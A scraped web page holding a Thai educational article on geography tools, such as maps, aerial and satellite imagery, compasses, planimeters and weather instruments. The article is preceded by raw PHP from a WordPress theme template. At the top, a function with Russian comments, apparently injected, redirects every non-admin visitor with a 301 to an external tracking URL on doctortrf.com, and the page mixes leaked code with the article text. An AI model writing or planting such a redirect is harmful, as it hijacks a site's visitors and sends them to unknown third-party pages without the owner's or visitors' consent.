function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * The template for displaying all single posts * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#single-post * * @package Fact News */ get_header(); ?>

เครื่องมือทางภูมิศาสตร์ ที่ควรรู้จัก

เครื่องมือทางภูมิศาสตร์

เครื่องมือทางภูมิศาสตร์

 

เครื่องมือทางภูมิศาสตร์ หมายถึง เครื่องมือในการตรวจสอบ และศึกษาสิ่งที่อยู่บนพื้นผิวโลก และบรรยากาศของโลก จึงได้ถูกออกแบบมาเพื่อตรวจสอบ และบันทึกข้อมูลทางด้านภูมิศาสตร์ ทั้งทางด้านข้อมูลเชิงปริมาณ และข้อมูลทางคุณภาพ เช่น การกำหนดพิกัดบนพื้นผิวโลก การวัดทิศทางการเก็บข้อมูล ภาคสนาม ในพื้นที่ต่าง ๆ หรือใช้เป็นเครื่องมือประกอบการเรียนรู้ ในห้องปฏิบัติการที่เกี่ยวข้องกับภูมิศาสตร์ ซึ่งเครื่องมือที่ใช้ ในการศึกษาข้อมูลทางภูมิศาสตร์ แบ่งเป็น 2 ประเภทใหญ่ ๆ คือ

 

  1. เครื่องมือทางภูมิศาสตร์ประเภทให้ข้อมูล

 

1.1 แผนที่ (Map) เป็นเครื่องมือทางภูมิศาสตร์ ขั้นพื้นฐานอย่างหนึ่ง โดยการย่อข้อมูลต่าง ๆ ที่ปรากฏบนพื้นโลกให้มีขนาดเล็กลงตามมาตราส่วน และแสดงข้อมูลดังกล่าว ด้วยสัญลักษณ์ลงบนวัสดุต่าง ๆ

 

 1.2 รูปถ่ายทางอากาศ (Aerial Photography) เป็นรูปภาพแสดงภูมิประเทศ ที่ปรากฏบนพื้นผิวโลก ถ่ายโดยใช้กล้องถ่ายรูปติดไว้กับเครื่องบิน ส่วนหน่วยงานที่จัดทำรูปถ่ายทางอากาศ คือ กรมแผนที่ทหาร  กระทรวงกลาโหม การนำไปไปใช้ประโยชน์มี ดังนี้

 

                   1) ทำให้ทราบถึงความเปลี่ยนแปลงในลักษณะ ทางกายภาพของพื้นที่ต่าง ๆ

                   2) การวางแผนพัฒนาการใช้ที่ดิน

                   3) การอนุรักษ์พื้นที่ป่าไม้

 

1.3 ภาพจากดาวเทียม

 

                   1 ภาพจากดาวเทียม (Satellite Imagery) ให้ประโยชน์อย่างมากในการศึกษาข้อมูลเพื่อสำรวจแหล่ง ทรัพยากรธรรมชาติ

                   2 การทำงานรับภาพของดาวเทียม เรียกว่า กระบวนการรีโมทเซนซิ่ง (Remote Sensing) โดย ดาวเทียมจะเก็บข้อมูลของวัตถุหรือพื้นที่เป้าหมาย บนพื้นผิวโลก จากรังสีที่สะท้อนขึ้นไปจากผิวโลก หรือจากอุณหภูมิของวัตถุนั้น ๆ บนพื้นผิวโลกจากนั้นดาวเทียมจะส่งข้อมูลเป็นคลื่นแม่เหล็กไฟฟ้า มายังสถานีภาคพื้นดิน ซึ่งจะบันทึกเป็นข้อมูลเชิงตัวเลขในแถบบันทึกข้อมูล เพื่อนำไปประมวลผลโดยคอมพิวเตอร์ และนำเสนอเป็นแผ่นฟิล์ม

                  3 ภาพจากดาวเทียวให้ประโยชน์ในการศึกษา ทางภูมิศาสตร์ คือ นำมาใช้จัดทำแผนที่แสดงภูมิ

ประเทศของพื้นที่ต่าง ๆ ซึ่งจะให้รายละเอียดของตำแหน่งต่าง ๆ บนพื้นโลกชัดเจนยิ่งขึ้น

 

             1.4 อินเทอร์เน็ต

                  1 อินเทอร์เน็ต (Internet) หรือ ไซเบอร์สเปซ (Cyber Space) คือ ระบบการสื่อสารด้วยเครือข่ายคอมพิวเตอร์ที่เชื่อมโยงระหว่างผู้ใช้งานทั่วโลกเข้า

                  2 บริการในอินเทอร์เน็ต (World WildWeb : WWW) จะให้บริการข้อมูลในรูปแบบต่าง ๆ ทั้งตัวอักษร รูปภาพ เสียง หรือภาพยนตร์ ข้อมูลเหล่านี้ เรียกว่า “เว็บเพจ” (Web Page) มีการเชื่อมโยงถึงกันทั่วโลก คล้ายใยแมงมุม

 

              1.5 ลูกโลกจำลอง

                   ลูกโลกจำลองเป็นสิ่งที่มนุษย์สร้างขึ้นเพื่อ จำลองลักษณะของโลก แสดงที่ตั้งอาณาเขต พรมแดนของประเทศต่างๆและลูกโลกจำลองยังสามารถ ใช้เป็นสื่อในการเรียนการสอนเกี่ยวกับโลกได้เป็นอย่างดี

 

  1. เครื่องมือทางภูมิศาสตร์ประเภทใช้หาข้อมูล

              2.1 เข็มทิศ (Compass) เป็นเครื่องมือบอกทิศอย่างง่าย ๆ โดยจะทำปฏิกิริยา กับแม่เหล็กโลกและแสดงค่าของมุมบนหน้าปัด

              2.2 เครื่องมือวัดพื้นที่ (Planimeter) มีลักษณะคล้ายไม้บรรทัดทำด้วยโลหะยาวประมาณ 1 ฟุต ใช้สำหรับวัดพื้นที่ในแผนที่ โดยเครื่องจะคำนวณให้ทราบค่า ของพื้นที่และแสดงค่าบนหน้าปัด

              2.3 เทปวัดระยะทางใช้สำหรับวัดระยะทาง ของพื้นที่ เมื่อลงไปสำรวจหรือเก็บข้อมูลภาคสนาม เทปวัดระยะทางมี 3 ชนิด ได้แก่ เทปที่ทำด้วยผ้า เทปที่ทำด้วยโลหะ และเทปที่ทำด้วยโซ่

              2.4 เครื่องย่อขยายแผนที่ (Pantograph) เป็นอุปกรณ์ที่ใช้จัดทำแผนที่อย่างหนึ่ง เพื่อย่อหรือขยายแผนที่ ให้ได้ขนาดหรือมาตราส่วนตามที่ต้องการ

              2.5 กล้องวัดระดับ (Telescope) เป็นอุปกรณ์วัดระดับความสูงจากพื้นดิน เพื่อสำรวจพื้นที่สร้างถนน โดยจะช่วยกำหนดระดับแนวถนนได้ตามที่ต้องการ

              2.6 กล้องสามมิติ (Stereoscope) เป็นอุปกรณ์ที่ใช้ดูรูปถ่าย ทางอากาศ เพื่อพิจารณาความสูงต่ำของ

ลักษณะภูมิประเทศ ในพื้นที่นั้น ๆ

              2.7 กล้องสามมิติ แบบพกพา เป็นอุปกรณ์ที่ใช้ดูรูปถ่ายทางอากาศ เพื่อพิจารณาความสูงต่ำของ ลักษณะภูมิประเทศ ในพื้นที่นั้น ๆ

              2.8 เครื่องมือวัดลักษณะอากาศแบบต่าง ๆ เช่น

 

                  (1) เทอร์โมมิเตอร์ (Thermometer) เป็นอุปกรณ์ที่ใช้วัด อุณหภูมิของอากาศ โดยทั่วไปนิยมใช้แบบหลอดแก้ว ที่บรรจุปรอทหรือแอลกอฮอล์ไว้ภายใน ค่าของอุณหภูมิมี 2 ระบบ ดังนี้

                    – ระบบเซลเซียส

                    – ระบบฟาเรนไฮต์

 

                  (2) บาโรมิเตอร์ (Barometer) เป็นอุปกรณ์ที่ใช้วัดความกดอากาศ มี 2 ชนิด คือ

                    – แบบแอนิรอยด์ (Aneroid) เป็นแบบตลับโลหะขนาดเล็ก ที่หน้าปัดจะมีเข็มแสดงค่าความกดอากาศไว้

                    – แบบปรอท ซึ่งประกอบด้วยอุปกรณ์สำคัญ 2 อย่าง คือ หลอดแก้วและอ่างแก้วที่บรรจุปรอท

 

                  (3) เครื่องวัดน้ำฝน (Rain Gauge)  เป็นเครื่องมือที่ช่วยในการวัดปริมาณ น้ำฝนโดยใช้ อุปกรณ์ที่มีลักษณะเป็นรูปทรงกระบอก มีกรวยต่อภาชนะรองรับ ภายในปากภาชนะรองรับ มีขนาดแคบและพอดีกับกรวย เพื่อลดการสูญเสียเนื่องจากการระเหย

 

                  (4) แอโรแวน (Aero vane) เป็นอุปกรณ์สำหรับวัดทิศทาง และความเร็วของลม แยกตามลักษณะการใช้งานได้ 2 ชนิด ดังนี้  

                    – วินแวน (Wind Vane) ใช้วัดทิศทางของลม มีสัญลักษณ์เป็น รูปไก่หรือลูกศร

                    – แอนนิโมมิเตอร์ (Anemometer) ใช้วัดความเร็วของลม

 

                  (5) ไฮโกรมิเตอร์ (Hygrometer)ใช้วัดความชื้นของอากาศโดยมีเส้นผมเป็นอุปกรณ์สำคัญ ถ้าอากาศมีความชื้นสูงจะทำให้เส้นผมยืดตัว แต่ถ้ามีความชื้นน้อยเส้นผมจะหดตัว ทั้งนี้หน้าปัดจะแสดงค่าความชื้นบนกระดาษกราฟให้เห็น

 

                  (6) ไซโครมิเตอร์ (Psychrometer) เป็นอุปกรณ์ใช้วัดความชื้นของอากาศอีกแบบหนึ่ง ประกอบด้วยเทอร์โมมิเตอร์ 2 อัน คือ เทอร์โมมิเตอร์ปรอท (เทอร์โมมิเตอร์ตุ้มแห้ง) และเทอร์โมมิเตอร์ที่ใช้ผ้ามัสลินหล่อน้ำให้เปียกอยู่ตลอดเวลา (เทอร์โมมิเตอร์ตุ้มเปียก)

 

กลับสู่หน้าหลัก http://toolofnadrive.com